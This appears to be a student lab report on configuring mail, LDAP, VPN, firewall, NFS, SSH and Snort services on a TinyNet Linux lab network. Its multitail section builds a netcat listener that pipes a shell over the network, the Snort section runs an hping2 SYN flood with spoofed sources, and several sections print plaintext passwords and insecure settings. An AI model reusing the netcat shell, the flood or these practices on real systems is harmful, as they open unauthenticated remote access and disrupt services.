1.

Secure Webmail: Sending mail using stunnel, mail submission port and
https://

Objective

Stunnel is a proxy service that is used to add TLS (Transport Layer Security) encryption
functionality to an existing server or client. Here, Stunnel is being configured for establishing
secure communication between the servers. The other objective of this enhancement is to add
a secure connection i.e. https:// in the webmail and using a mail submission port.

List of configuration files

At first stunnel should be configured in all four machines.

For the configuration of stunnel, we should first provide the execution bits to the rc.stunnel
file whose location is the /etc/rc.d/rc.stunnel.

We have used Midnight Commander for providing execution permissions to rc.stunnel.

After the execution bits are set, we start the stunnel service
"/etc/rc.d/rc.stunnel start"
Now we go forward to install TinyNetCA certificate. For this go to a browser and type the ip
address of WebServer. Now click the link on the page that says "Download TinyNet Root
CA certificate". By clicking this the certificate will be downloaded.
Now after downloading the certificate it's time to install it on our browser. We have choosed
chrome as our browser. In chrome browser we can download the certificate by navigating to
the
"3 dots – Settings – Advanced – Privacy & Security – Manage Certificates"
Now browse or select the TinyNetCA certificate file and make sure to add it in Trusted Root
Certification Authorities
After the installation of the certificate the browser history is cleared for 192.168 site. After this
browser is restarted to start a new cache session and now we access the squirrelmail site with
http://192.168.56.202 and now we add https:// before the IP of webserver. Finally we have a
secure connection with https://.
Screenshots

Figure 1 Listening Ports

Listening ports on all four machines. Here all the services with their respective port number
are listed.

Figure 2 Trusted Root CA store with TinyNetCA

This screen shows the Trusted Root CA root where TinyNetCA is also listed.
Figure 3 Squirrelmail with https://
1. Cross-System Multitail

Task Owner: Aaditya Jha (NP000290)

Objective of this enhancement

Multitail is an open source ncurses utility that is used to demonstrate multiple logfiles to
standard in a same window and a same shell. It usually shows last few lines of logfiles in a
real-time like tail command splitting a single console into more subwindows. It is also used for
color highlighting, adding, removing and filtering windows and many more. (Saive, 2014)
This enhancement is made to:
i. View the logfiles of postfix on Gateway and Mailserver in different windows using
multitail. Telnet service is to be used for sending mails and demonstrating the postfix
logfiles.
ii. View the logfiles of postfix on Gateway and Mailserver in a single window with
different colors using a different method than above. Mulltitail setup is to be done to
view logfiles on same window.

List of Configuration files and steps

The two methods that we have chosen for this enhancement are SSH and Netcat. Using SSH
connection between Gateway and Mailhost we have monitored multiple postfix logfiles with multitail
in a different subwindows. For another method we have used Netcat to view postfix logfiles in a same
subwindow but in different color.
For multitail with SSH:
We have already started sshd service in our base system by giving executable bits and command
/etc/rc.d/rc.sshd start. Also, we have configured telnet file and run the xinetd service.
Now for the ssh configuration,
On both Gateway and mailhost we should edit the /etc/ssh/ssh_config file by adding:
"host *
ControlPath /tmp/ssh-%r@%h:%p
ControlMaster auto
# ControlPersist 10m"
 After adding the above commands to the ssh_config file on both Gateway and mailhost, we should
make a ssh connection between these two servers. For doing that, on Gateway we should enter the
following commands:
"ssh root@mailhost.tinynet.edu"
After giving the password as "toor" the ssh connection is established.
Then we go to a new terminal window by pressing alt + F2. In this terminal we will run the multitail
command.
"
multitail /var/log/postfix.log –l "ssh root@mailhost.tinynet.edu" tail –f /var/log/postfix.log
"
After this multitail command we send some test mails using squirrelmail. After successful mail transfer
the logfiles are displayed on two separate subwindows.
For Multitail with Netcat:
In Mailhost the following commands should be entered:
"mkfifo /tmp/foo
Ln –s /bin/foo |bsdnc –lkv 23432 |/bin/rbash 1>/tmp/foo &"
After these commands we go to the Gateway to monitor the postfix logfiles
"
multitail –ci yellow /var/log/postfix.log –ci red –L "echo 'tail /var/log/postfix.log' |nc
192.168.56.108 23432
"
After this some test mails are sent and the output is shown in same window with different colors for
both servers.

Screenshots
 Figure 4 Editing file ssh_config
This window is of while editing the file ssh_config under the /etc/ssh directory. The last four lines
are added in this file.

Figure 5 SSH connection between Gateway and Mailhost

This window shows the ssh connection established between the Gateway and Mailhost servers.
 Figure 6 Multitail before sending mail
This is the initial state of postfix logfiles before sending mails. Here, upper window sis of gateway
and lower one is of mailhost.

Figure 7 Mail sent using Telnet

Here, a test mail is sent from mailadmin@mail.tinynet.edu. This mail was successfully sent to the
mailhost server.
 Figure 8 Multitail after mail sent
Here, the logfile is shown after a test mail was sent to the mailhost.

Figure 9 Netcat Commands

Here, commands for establishing netcat is shown.
 Figure 10 Multitail command
This is the command for multitail using netcat.

Figure 11 Initial state of Multitail Netcat

Here postfx logfiles are shown of both Gateway and Webserver. The orange color is for the
Gateway and the red one is for the mailhost.
 Figure 12 Final state of Multitail Netcat
This is the output of the multitail postfix logfiles by using netcat after sending the test mail using
telnet.

Obstacles encountered
None
2. LDAP – The missing piece of our enterprise network

Owner: Aaditya Jha (NP000290)

Objective

LDAP stands for "Lightweight Directory Access Protocol". It provides a single directory source for
system information look-up and authentication. It defines the methods by which directory data is
accessed. The objective of configuring this enhancement is to:
i. Have two domains (o= and dc=) for LDAP server
ii. Setup LDAP with squirrellmail and Dovecot.
iii. Get LDAP to use stunnel.

List of configuration files

1. LDAP Setup with two domains

i. Open “/etc/openldap/slapd.conf” file and edit as follows:
" access to *
By dn="cn=LDAPAdin,o=tinynet.edu" write
By self write
By * read
Again under 'rootdn “cn =LDAPAdmin,dc=tinynet,dc=edu”', the same changes
are made
ii. After this LDAP service should be enabled by making file executable.
iii. LDAP service is enabled by providing 755 permissions using mc to the file
/etc/rc.d/rc.ldap.
iv. After setting the permissions rc.ldap should be restarted.
"/etc/rc.d/rc.ldap stop
/etc/rc.d/rc.ldap start"

v. Now “/etc/openldap/topClass.ldif” is edited as follows:

"dn: cn=LDAPAdmin, o=tinynet.edu
objectClass: organizationalRole
objectclass: simpleSecurityObject #this is added
cn: LDAPAdmin
description: LDAP Administrator #this is added
userPassword: {PLAIN}slapmesilly"
vi. Now, again restart the LDAP server
"/etc/rc.d/rc.ldap stop"
"/etc/rc.d/rc.ldap start"
vii. Also run command
’Ldapadd -x -D “cn=LDAPAdmin,o=tinynet.edu” -w slapmesilly -f
/etc/openldap/topclass.ldif’
This above steps is to create the First DIT or top-level domain of the LDAP service with "o="
format and tell the system to add the First DIT.
viii. Now we add some user data to the domain or First DIT created. It is done by following
command:
’ldapadd -x -D “cn=LDAPAdmin,o=tinynet.edu” -w slapmesilly -f
/etc/openldap/userdata.ldif’
ix. Now we test LDAP search by executing the following command:
‘ldapsearch -x -b “o=tinynet.edu” “(ou=UserNetB)” cn uid mail’
x. Now we have to create the second DIT (dc=tinynet,dc=edu), "dc=" is our domain.
In file /etc/openldap/topclass.ldif we make following changes:
"dn: dc=tinynet,dc=edu
objectClass: top
objectClass: dcObject
objectClass: organization
o: MyTinyNet
dc: tinynet
description: LDAP Root"
xi. Now, we go towards Webserver squirrelmail configuration. To configure,
Goto, /var/www/squirrelmail/config/config_svr_ldap.php
Copy and paste the example configuration block and edit as follows
"$ldap_server[0] = Array(
'host' => 'localhost',
 'name' => 'ldap o=tinynet',
'base' => 'o=tinynet.edu'
);"
Now we need to change the PLA configuration so it will be directed to localhost rather
than LDAP server.
After this we will kill the monkey process with htop and SIGTERM.
Now, we start the service using command:
"/usr/sbin/monkey –D"
xii. Now, moving towards the Mailserver for dovecot configuration.
Go to file /etc/dovecot/dovecot.conf
Uncomment the passdb ldap and userbd ldap section to get the following:
"
passdb ldap {
# Path for LDAP configuration file
args = /etc/dovecot/dovecot-ldap.conf
}

userdb ldap {
# Path for LDAP configuration file
args = /etc/dovecot/dovecot-ldap.conf
}
"
Now, we go to the file /etc/dovecot/dovecot-ldap.conf and edit the following lines:
"
hosts = localhost
pass_filter = (mail=%n@%d)
user_filter = (mail=%n@%d)
"
Now we should restart the dovecot service for new configurations made.
"/etc/rc.d/rc.dovecot stop"
"/etc/rc.d/rc.dovecot start"
 Connecting to squirrelmail and try the address book as follows:
Compose – Addresses button –List All Button
Similarly, second DIT also requires same configurations to the LDIF, dovecot and
squirrelmail.

Screenshots
Figure 13 Removing ldaps:/// from rc.ldap
Figure 14 rc.ldap before removing ldaps:///

Figure 15 Changing ownership to nobody

Figure 16 slapd.conf before editing

Figure 17 Adding new entries

Figure 18 Before editing topclass.ldif

Figure 19 topclass.ldif after editing

Figure 20 Checking list on LDAP

3. SUDO
Owner: Aaditya Jha (NP000290)
Objective

Sudo is a feature or program in a Linux operating systems that provides administrative

privileges to normal users. Sudo stands for "Superuser do" which means the tasks and
permission that super user is capable of.
The main objectives of this enhancement is to :
i. Show a random fortune in color on every login for different users on the startup
display.
ii. Force the normal users to use sudo. No root access is to be allowed.
iii. Show different prompts of colors for different types of users that is, root users have
different color and normal users have different color.

List of configuration files

i. Random Fortune after every login

For displaying the random fortunes after every login rather than showing the command
summary, we have to first install the Ascii Art package from SetupMenu under /mnt/hdc
directory. After that we should edit the file /etc/profile.d/slax.sh by adding the following
commands:
"
# save the fortune to a variable
FF=$(fortune)

#show plaintext
Echo –e "\e[01;32m"; echo $FF |boxes; echo –e "\e[00m"
"
The above changes will display a random fortune in green color every time a user logs in.
After this we should clear the /etc/issue file.
ii. For Sudo
For demonstrating the use of sudo we should create multiple user accounts. On Mailhost
Server we have created three different users by the command "adduser" and entered the
following details:
" Username: aaditya; password: aadi2000
Username: manisha; password: manisha123
Username: Pranesh; password: pranesh123"

After the "adduser" command now we have three normal user accounts on Mailhost.
After the creation of three users we should edit to the sudoers file
/etc/sudoers
- To make force to the users using sudo command we should edit the /etc/sudoers file as
follows:
" #User Privilege specification
Root ALL=(ALL) ALL
Aaditya ALL=(ALL) ALL
Manisha ALL=(ALL) ALL
Pranesh ALL=(ALL) ALL /usr/sbin/monkey –D
- We have configured the user "Pranesh" to have access to /usr/sbin/monkey –D to
have a difference among the other users which will make easier demonstration.
By the above step now every user will be forced to use sudo.
iii. Color Prompts for each user type
For having different color prompts to different user types we need to edit the /etc/profile
file as follows:
" # Set a default shell prompt
…..
else
if [ $(id –u) -ne 0 ]; then
#non-root user
PS1='[\[\033[01;32m\]\u@\h \[\033[01;34m\]\W\[\033[00m\]]$ '
else
#root user
PS1='[\[\033[01;31m\]\u@\h \[\033[01;34m\]\W\[\033[00m\]]# '
fi
fi"
The above command tells that if the user ID is not equal to 0 then the system will use green
color (01;32m) else for the root users the system will use the red color (01;31m) as the color
prompts.
 From the above enhancements, the Mailhost system will not allow root access and other
normal users should use sudo for administrative actions. The system will show a random
fortune with color everytime a user logs in. Also, every type of users will have different color
prompts like root users will have red and normal users will have green color prompts.

Screenshots of tests

Figure 21 Installing Ascii Art

Here we need have installed the Ascii Art package.
 Figure 22 Editing file slax.h
This screenshot shows editing of file slax.sh which is inside the /etc/profile.d directory

Figure 23 Random fortune after root login

This screenshot shows the random fortune when we login as root.

Figure 24 Random fortune after next login

For next time we login the fortune changes.
 Figure 25 Editing file /etc/sudoers
Editing sudoers to force all users to use sudo.

Figure 26 Root account locked

Here, root access is locked. So, root login displays this error.
 Figure 27 Adding new user aaditya
Useradd Aaditya. Creation of a user additya. Similarly other two users have been
created Manisha and Pranesh.

Figure 28 Permission denied for changing directory

User "Aaditya" trying to access the /etc/dovecot/mail-pwd file but could not access.
 Figure 29 Sudo worked for unlocking root account
Sudo worked for unlocking root account.

Figure 30 Editing file profile

Editing /etc/profile for making different color prompts for different user types.
 Figure 31 Color prompt for user aaditya
This window displays the color prompt for user aaditya.

Figure 32 Color prompt for root login

This window displays the color prompt for root login.

4. OpenVPN
Owner:
Objective
OpenVPN is an open-source software used for commercial purposes to implement a virtual
private network techniques for creating secure poin-to-point connection. The objective of this
enhancement is to setup OpenVPN by using static keys. Making two setup files for tun and
tap.

List of configuration file

At first, we should install the OpenVPN package form SetupMenu under the directory
/mnt/hdc. After the installation, we should copy dh1024.pem, serv.cre, server.key, tmp-ca.crt
in the server to the server side from /user/share/doc/openvpn-2.0.9/sample-keys to the
directory /etc/openvpn/keys. Now, from the directory /user/share/doc/openvpn-
2.0.9/sample-config-files we should copy the server.conf file to /etc/openvpn.

Now we should edit the server.conf and client.conf files to reflect the PKI generated which
are ca, cert, key and dh parameters. In the server.conf file make configurations as follows.
"
ca /etc/openvpn/keys/tmp-ca.crt
cert /etc/openvpn/keys/server.crt
key /etc/openvpn/keys/server.key
"
For the dh,
"dh /etc/openvpn/keys/dh1024.pem"

For Tun and Tap Configuration,

Running the command
"modprobe tun"
This command will run Tun and Tap. For testing the Tun and Tap type,
"cat /dev/net/tun"
For testing the OpenVPN service whether it is operating or not type,
"openvpn server.conf"
For the establishment of secured handshake, we should have the same keys of Certificate
Authority (CA) that is generated by OpenVPN on both client and server side. To generate the
certificate following commands is required on both client and server.
"/usr/doc/opnevpn-2.0.9/easy-rsa"
"./vars"
"./clean-all"
"./bulid-ca"
Now we should add some command lines in the directory /usr/doc/openvpn-2.0.9/easy-rsa/
i. "./build-key-server server"
ii. Adding the Name field as "server the confirming the certificate with 'y'
iii. "./build-dh" and then check for the dh1024.pem exists in mc mode.
iv. Now copy the newly generated keys from /keys directory to /usr/doc/openvpn-
2.0.9/sample-config-files/ in mc mode.
Configuring the client
Client should also make the same configurations as above and add the following commands
i. Copy the newly generated Certificate Authority (CA) keys i.e. ca.key and ca.crt to
/keys in the client.
ii. Change the directory to /usr/doc/opnevpn-2.0.9/easy-rsa/ and run
"./build-key client"
iii. Enter the 'Common Name' field as "client" and confirm the certificate with 'y'.
iv. Now, copy all the client keys that are newly generated and certificates of /key
directory to /usr/doc/openvpn-2.0.9/sample-config-files/ in MC mode.
Configuring Tun files for server and client
Now editing the ./server.conf under the directory /usr/doc/opnevpn-2.0.9/sample-config-
files/ like following:
"
;dev tap
Dev tun
"
Now check for the ca.crt, server.crt, server.key and dh1024.pem whether it is properly
defined.
 And adding
• ; server-bridge 192.168.8.8 255.255.255.0 192.168.8.128 192.168.8.254
• server 10.8.0.0 255.255.255.0

Now edit the ./client.conf for client as following

" ;server
Figure 33 Basic Commands after openvpn installations
;client
;dev tap
dev tun
remote 192.168.76.101 1194
;remote my-server-2 1194
Check for ca.crt, client.crt and client.key are properly defined.
"
Now starting the testing for Tun
On both server and client create and start the tun by entering the following commands.
" Figure 34 Configurations of servers

Mkdir /dev/net
Mknod /dev/net/tun c 10 200
"
Now enter the following commands
"
/usr/doc/openvpn-2.0.9/sample-config-files/
openvpn tun-server.conf
"
For Tap, In client and server side configuration enter following commands.
"
/usr/doc/openvpn-2.0.9/sample-config-files/
Figure 35 Adding attributes to vpn services
openvpn tap-server.conf"

Figure 36 Commitment of certification

Screenshots
5. Iptables

Task Owner: Aaditya Jha (NP000290)

Objective

Iptable is an administrative tool that network administrator uses for IPv4 packet filtering
and NAT. Here, the objective of this enhancement is to add six iptable rules to filter out
the TCP stack and the network should not be processing the TCP stack. Also, the other
objective is to show all the six rules added using hping2 and multitail.

Configurations made

At first we should add six rules, we can add them by following commands:
Rule 1: "iptables –A INPUT –p tcp –tcp-flags ALL NONE –j LOG –log-level alert –
log-prefix "iptables ALL NONE"
Rule 2: "iptables –A INPUT –p tcp –tcp-flags FIN,SYN FIN,SYN –j LOG –log-level
alert –log-prefix "iptables FIN,SYN FIN,SYN"
Rule 3: "iptables –A INPUT –p tcp –tcp-flags SYN,RST SYN,RST –j LOG –log-level
alert –log-prefix "iptables SYN,RST SYN,RST"
Rule 4: "iptables –A INPUT –p tcp –tcp-flags FIN,RST FIN,RST –j LOG –log-level
alert –log-prefix "iptables FIN,RST FIN,RST "
Rule 5: "iptables –A INPUT –p tcp –tcp-flags FIN,ACK FIN –j LOG –log-level alert
–log-prefix "iptables FIN,ACK FIN"
Rule 6: "iptables –A INPUT –p tcp –tcp-flags ACK,URG URG –j LOG –log-level
alert –log-prefix "iptables ACK,URG URG"

Now, to see all the iptable rules added above we use

"iptables –L"
As stated in the question, we must show the iptable rules using hping2 and multitail. So,
we enter the following commands for displaying the rules using hping2 and multitail
Rule 1: 'multitail /var/log/syslog –l "hping2 192.168.56.101"
Rule 2: 'multitail /var/log/syslog –l "hping2 –F –S 192.168.56.101"
Rule 3: 'multitail /var/log/syslog –l "hping2 –S –R 192.168.56.101"
Rule 4: 'multitail /var/log/syslog –l "hping2 –F –R 192.168.56.101"
Rule 5: 'multitail /var/log/syslog –l "hping2 –F 192.168.56.101"
Rule 6: 'multitail /var/log/syslog –l "hping2 –U 192.168.56.101"
 Figure 46 Adding rules of iptables
In this screen we have added all six rules for filtering the TCP stack.

Figure 47 List of newly added rules

This screen shows the list of added iptable rules.
The following six screens shows the rules of iptables using hping2 and multitail. Each figure
represents one rule.
Figure 48 Displaying rule 1

Figure 49 Displaying rule 2

Figure 50 Displaying rule 3

Figure 51 Displaying rule 4

Figure 52 Displaying rule 5

 Figure 53 Rule 6
Screenshots of tests, with explanation
Virtual Servers
a) Set up two normal users, and add directories under their home directories for their web
pages and CGI scripts
b) In monkey.conf set up two virtual servers (VirtualHost) for them, and disallow serving
web pages from user home directories
c) Configure the system so users cannot access the VirtualDocumentRoot directories, add
cnames, and set up a cron job to automatically move files from home directories to the
proper VirtualDocumentRoot

Owner:

Objective – what this does for the system

Two directories htdocs and cgi-scripts are created for two non-root users each in their

home directory, and virtual hosts in monkey.conf file that defines root directory to store
web files for each user.  
CNAME defines an alias in webserver to make easier rather using whole hostname.
Similarly, crontabs checks, edit/view the command using cron daemon that need to
be executed repeatedly. 

List the relevant configuration files, and for each one briefly describe what was done

1.      monkey.conf in /etc/monkey/monkey.conf 
The file monkey.conf  set two users for web files and cgi-scripts and
users (i.e. harry and aadhitya) were added to file as shown here: - 
  
 
2.       Cnames in /etc/dnsmasq.d/cnames in Gateway server 
CNAME maps alias of  one domain name to another in DNS. Other two CNAMES were specified along
with which hostname bananas.tinynet.edu (monkey) was added. 
  
 
 
3.      /var/spool/cron/crontabs/root 
Crontabs runs a list of commands at every 10 minutes interval and files move from user home directory to
Virtual Document Directory where at file /var/spool/cron/crontabs/root foyr crontabs are added.  
 
Screenshots of tests, with explanations

Virtual server followed the steps: - 

1. Creating default home directories for two non-root users  
        useradd -m harry 
  
        useradd -m aadhitya 
 

 
 
2. Creating two directories htdocs and cgi-scripts in their respective home directory 
cd /home/harry 
               mkdir htdocs cgi-scripts 
cd /home/harry 
              mkdir htdocs cgi-scripts 
  
3. Adding two virtual hosts in the file monkey.conf 

 
 
4. Permissions were changed for home directories for each user using mc which was then continued
pressing F9 and changing the mode of permissions by removing read/execute permissions for all owner,
group and others following File>ChMod.  

 
Fig: - permission change for harry directory
  
Fig: - permission change for aadhitya directory

Obstacles encountered, obstacles overcome

Running commands using crontab and making two directories for teo no-root users each was
difficult which was sorted out using internet resources. 

Any Outstanding/Unresolved Issues

None
7. NFS
a) Put the webserver VirtualHost DocumentRoot directories (from above) on a new VM
which will be the server for NFS mount
b) Set up the VirtualHost users on the NFS server, create directories under their home
directory for their website files, and allow them to put files in using ssh
c) Run the cron jobs on the NFS server

Owner:

Objective – what this does for the system

- NFS put the webserver directories over a new VM, that behaves as server.
- Create directories under home directories on NFS server and use ssh files to
allow them and run cron jobs on NFS.

List the relevant configuration files, and for each one briefly describe what was done

1. /etc/monkey/monkey.conf

This file has been already set up in virtual server and was configured in NFS server.
 Fig: - virtual hosts for harry and aadhitya

1. /etc/exports

This file explains about what files to be added to NFS server and following line was
added to file –
/var/monkey/htdocs *.tinynet.edu(ro, sync, no_subtree_check, no_root_squash)
 Fig: - /etc/exports file in webserver

Steps to create NFS

1) TinyNetConfig.iso file was mounted on new base system and was

configured using no role option.
Fig: - configuring NFS as no role

Fig: - unique simple host name

2) Execute permissions were set to owner, group and others on two files
/etc/rc.d/rc.rpc and /etc/rc.d/rc.nfsd.

Fig: - execute permissions for rc.rpc in NFS

Fig: - execute permissions for rc.nfsd in NF

Above permissions are also set on to webserver.

Fig: - execute permissions for rc.rpc in webserver

 Fig: - execute permissions for rc.nfsd in webserver

3) rc.rpc and rc.nfsd was successfully run on both NFS and webserver.

/etc/rc.d/rc.rpc start

/etc/rc.c/rc.nfsd start
 Fig: - restarting the service on NFS

4) can check mounted share directory on webserver using the command: -

showmount -e 192.168.56.106

5) the shared folder of NFS server is mounted on home directory of

webserver.

Mount 192.168.56.106:/var/monkey/htdocs /home/

6) /var/tmp directory was used to transfer files in NFS serever.

7) New users harry and aadhitya was created.

useradd -m harry

useradd -m aadhitya
 8) Setting virtualhost on monkey.conf file

<Virtualhost>

VirtualServerName harry.tinynet.edu

VirtualDocumentRoot /var/monkey/htdocs/harry

VirtualScriptAlias /cgi-bin/ /var/monkey/htdocs/harry/cgi-scripts/

VirtuaForceGetDir off

</Virtualhost>

<Virtualhost>

VirtualServerName aadhitya.tinynet.edu

VirtualDocumentRoot /var/monkey/htdocs/aadhitya

VirtualScriptAlias /cgi-bin/ /var/monkey/htdocs/aadhitya/cgi-scripts/

VirtuaForceGetDir off

</Virtualhost>

9) Edit the /etc/ssh/sshd_config file and restart ssh service.

/etc/rc.d/rc.sshd stop

/etc/rd.c/rc.sshd start

10) Setup cronjobs to setup files from /var/tmp/ to user directory.

*/10 * * * * mv -f /var/tmp/* /home/sulabh/htdocs

*/10 * * * * mv -f /var/tmp/* /home/rajesh/htdocs

Screenshots of tests, with explanations

1. “/etc/export file for webserver”

2) “start rc.rpc and rc.nfsd service.”
Obstacles encountered, obstacles overcome

“The NFS was unable to mount the /var/monkey/htdocs folder.”

Any Outstanding/Unresolved Issues

None
8. SSH Key Management

Owner:

Objective

List of configuration files

For setting up key-based authentication for ssh agent following configurations are made:
i. Creating a key pair for the server on the local host
We can generate an SSH key pare by executing ssh-keygen command. The keys are stored
by default inside $HOME/.ssh/ directory and are named according to the encryption
mechanism used. When we are asked for the location, we can give a name of directory that
identifies the remote host that keeps the keys organized.
ii. Copying the public key to the remote server
To copy the public key to the remote server we can run the following command:
"scp ~/.ssh/id_rsa.pub username@remote-server.org:"
We must enter the password for our remote user account when it is asked.
iii. Installing the public key on the remote server
For installing the public key on the remote server, we must login and under our home
directory a .ssh must be created. After the directory is created we should append our public
key to the list of authorized_keys by the following command:
"cat ~/id_rsa.pub >> ~/.ssh/authorized_keys"
After appending the public key the id_esa.pub is deleted from home directory. Now we must
check for whether the proper permissions are set on all relevant files. The permissions are
like follows:
For the local system
"chmod 700 ~/"
"chmod 700 ~/.ssh"
"chmod 600 ~/.ssh/id_rsa"
 For the remote system
"chmod 700 ~/"
"chmod 700 ~/.ssh"
"chmod 600 ~/.ssh/authorized_keys"
iv. Adding a passphrase on the local host to the ssh-agent
An ssh-agent is a program that caches our decrypted private keys and sedn it to the SSH
client. We should provide our passphrase only once while adding our private key to the
agent's cache. To add our prvate key we use following command.
"ssh-add ~/.ssh/id_rsa"
And then enter the passphrase when asked. Now, after the addition of private key we can
make SSH connections without entering passphrase.
v. Configuring the user startup file to execute ssh-agent automatically after every boot.
By adding the following lines in the ~/.bashrc
"
if ! pgrep -u "$USER" ssh-agent >/dev/null; then
ssh-agent > ~/.ssh-agent-values
fi
if [ "$SSH_AGENT_PID" == "" ]; then
eval "$(<~/.ssh-agent-values)"
fi
"
Now, placing the "AddKeysToAgent yes" in the Host section of the file /etc/ssh/ssh_config
will store all keys in agent by ssh clients on first use.
Screenshots
 Figure 54 ssh-keygen

Figure 55 Copy keys in Gateway

Ssh key copied through gateway

Changing permissions in gateway

Changing permission in mailhost

Run necessary variable and add private to agent

Adding code to bashrc

9. IDS

Owner: Pranesh Maharjan

Objective of this enhancement

Snort is an open source Intrusion Detection System (IDS). It is used for detecting different types to
activities on the system. This enhancement is made to setup snort and by using hping2 and multitail we
should demonstrate triggering a specific snort rule. hping2 and multitail is used to generate traffic and
demonstrate the recognized traffic.

List of configuration files

Snort is a default package that comes with the TinyNetConfig.iso file. At first we should install the
snort package by opening SetupMenu file under the /mnt/hdc directory. Inside the SetupMenu we have
choosed Snort which is inside the Install Other packages. After the installation of snort we should
configure the snort file.
Changing the snort rules path:
Goto the directory /etc/snort/ and edit the file snort.conf by changing the RULE_PATH to
/etc/snort/rules. Then on line 667 we should uncommeting the output alert_syslog and we should add
five new path way as follows:
"include $RULE_PATH/gpl-back~r.rules
include $RULE_PATH/gpl-ddos.rules
include $RULE_PATH/http.rules
include $RULE_PATH/icmp.rules
include $RULE_PATH/other.rules"

After adding the 5 rules we should confirm the path point to the correct directories.
"var RULE_PATH /rules
var PREPROC_RULE_PATH /preproc_rules"

Screenshots of tests with their explanation

This screenshot is for installing Snort package by going to the SetupMenu under the /mnt/hdc
directory. Here, we have selected Install other packages and under it Snort in selected.

This screenshot shows that snort package is installed.

Here, the RULE_PATH of the file snort.conf is confirmed to be /etc/snort/rules and that of
PREPROC_RULE_PATH is to be /etc/snort/preproc_rules.

The alert syslog is uncommented here.

To start Snort, the following command is to be written
"snort –c /etc/snort/snort.conf –A console"

In this screen DDos attack is committed using hping tool from the gateway to the webserver. Here, in
this command "-c" means number of packets, "-d" is the data size or size of packet sent, "-S" is to set
the SYN flag, "-w" is the size of window (default is 64), "-p" is the port number, "—rand-source" is
the random source address mode.
 This screen shows how snort monitors the attack done to the webserver.

Obstacles
10. Compile and Install
a) Setup a VM using the TinyNet-gcc image
b) Install the asciiart package from the configuration CD
c) Compile the toilet source code and demonstrate using shell scripts
d) Explain the last four lines of the SlaxBuild script

Owner:

List the relevant configuration files, and for each one briefly describe what was done

Setting up GCC virtual machine 

A virtual machine is set up with a TinyNet-gcc.iso file, assigning 320 MB memory
for the RAM and 550 MB memory for
hard disk. Then, by downloading lilionst.sh, give access to the basic operating system. 
Installation of neccesary package 
Asciiart packages is installed from TinyNetConfig.iso, it is modified from
optical drivptical drive. 
Installing files from Asciiart packages 
Ascii is required to have libcaca, sl and toilet files. Four files called template, libcaca, sl, toilets
will be displayed as /opt/. The following files Toilet-0.3.tar.gz, sl-5.02.tar.gz and Libcaca-
0.99.beta19.tar.gz are required among all those files displayed. We extract and access files
in the /opt / directory after compression. Then we get 3 files in /opt / directory which
are /libcaca-0.99.beta19,/toilet-0.3,/sl-5.02. And set them with a command
like./libcaca.build, /sl.build, & /toilet.build. 
 
Libcaca configuration 
The libcaca code must be updated by copying the Template. SlaxBuild within the /opt / directo
ry and changed to "libcaca.build" 
Configure libcaca.build file as: - 
RGNAM=libcaca (“replace with name of the application”)  
VERSION=0.99.beta19 (“replace with version of the application”) 
SRCFN=.tar (“replace with source archive type”) 
 
Inside libcaca.build file following lines are added and other are uncommented: - 
   --disable-csharp \ 
   --disable-java \ 
   --disable-python \ 
   --disable-ruby  
After all this, libcaca.build file is run by the code ./libcaca.build that will pop out information. 
Toilet build configuration 
Ensuring that the code of libcaca.build is run and compiled smoothly, compilation for code of
toilet is confirmed. Then, Template.SlaxBuild is copied in /opt/ and is modified
to “toilet.build”. 
Update the toilet file as: - 
 PRGNAM=toilet (“replace with name of the application”) 
VERSION=0.3 (“replace with version of the application”) 
SRCFN=.tar.gz (“replace with source archive type”) 
 Section under “#automake Build Options” is uncommented. 
 
 
Toilet view with shell script 
After successful implementation of toilet.build package, following code is written inside
shell script: 
cat>AnyNameYouLike 
#!/bin/bash 
Under supercharged ://my-tiny.net/L 18-aart.htm and toilet –f mono9 $(pwd +%A) are
used. 
After saving the file shell script is made executable and configure script with –F gay border  
‘’LycheePie” code for demonstrating toilet.build inside shell script. 
 

What do the last four lines of the SlaxBuild script do?

The last 4 lines of SlaxBuild formalize the program while compiling, rather than 
manually. However, it produces an appropriate "slackware package" that can be 
installed/uninstalled while upgrading the program. 
  
FIG: - Slaxbuild script
Screenshot of sl (the Linux Steam Locomotive)

Fig: - Result of sl
Screenshots of tests, with explanationsFig: - login into GCC
Fig:- /opt/ after toilet.build

Fig: - Lycheepie
Obstacles encountered, obstacles overcome

The toiled.build and libcaca.build were difficult to load before but later was corrected
after applying Chmod permission.

Any Outstanding/Unresolved Issues

Takes time to load script command.

11. regex
a) Describe three ways using regular expressions with MultiTail can make logfile
monitoring/analysis more effective
b) Evaluate txt2regex as a tool for creating regular expressions to use with MultiTail: What
are its strengths? What are its weaknesses? What do you wish it would do? How would
you change it?

Owner:

Three ways using regular expressions with MultiTail

 
 Multitail has text highlighting feature using “colorschemes” 
Multitail command uses two files (“i.e. an apache acess log and tomcat Catalina
log”) with two different colorschemes.  
“multitail -cS apache /tmp/apache/access_log -cS log4j $
{TOMCAT_HOME}/logs/catalina.out” 
Colorscheme is used to highlight text and can add
additional colorscemes to ~/.multitailrc 
“check_mail:0 
colorscheme:xml 
# element text 
cs_re_s:white:>([^<]*)< 
# attribute key 
cs_re_s:green: ([^ =]*)= 
# attribute value 
cs_re_s:red:=("[^"]*") 
# element name 
cs_re:blue,,bold:<[^>]*>” 
  
Multitail also use folloeing command 
“multitail -cS xml /var/log/config.xml” 

Evaluation of txt2regex

Txt2regex is used to convert expression into regexes. “/txt2regex.sh” command is used

 to run bash program and works only in bash with version >=2.04. Bash program builds
more than 20 regex programs, procmail.

Screenshots of tests, with explanations

Fig: - colorscheme
Obstacles encountered, obstacles overcome

None

Any Outstanding/Unresolved Issues

None
12. Protocol Analyis

Owner:

Objective

The objective of this enhancement to use the tcpflow to capture the dialog between the browser and the
webserver when
i. to access the default monkey webpage. How can we recover the images
ii. to access a mailbox in squirrelmail.

List of configurations

The tcpflow is by default installed by every tinynet servers. We can use the "-ce" for printing on the
screen by the folowing command.
“root$ tcpflow -p -c -i eth0 port 80 | grep -oE '(GET|POST|HEAD) .* HTTP/1.[01]|Host: .*'”
The above command enables us to get a lists of HTTP verns to meet our needs. The "eth0" is the name
of the interface of the machine that can be renamed with alternative names if required.
Now, type the following command on the webserver:
"tcpflow –v –I any –s 'host 192.168.56.252 and port 80"
The above command is used to generate files under the /root directory of the server.
Now, open another terminal using Alt + F2 and start the links browser on the webserver and open
squirrelmail using the links browser.

Screenshots of tests, with explanations

The above screen shows the listening of the port from the IP address "192.168.56.252"
Above screen appears after the ip address is entered
13. Migrate to Net-R
Owner: Pranesh Maharjan (NP000323)
Objective:

List of configurations

Configure the NET-R Servers

i. After the final configuration of all servers we can now clone all the four server i.e.
Webserver, Mailhost and LDAP
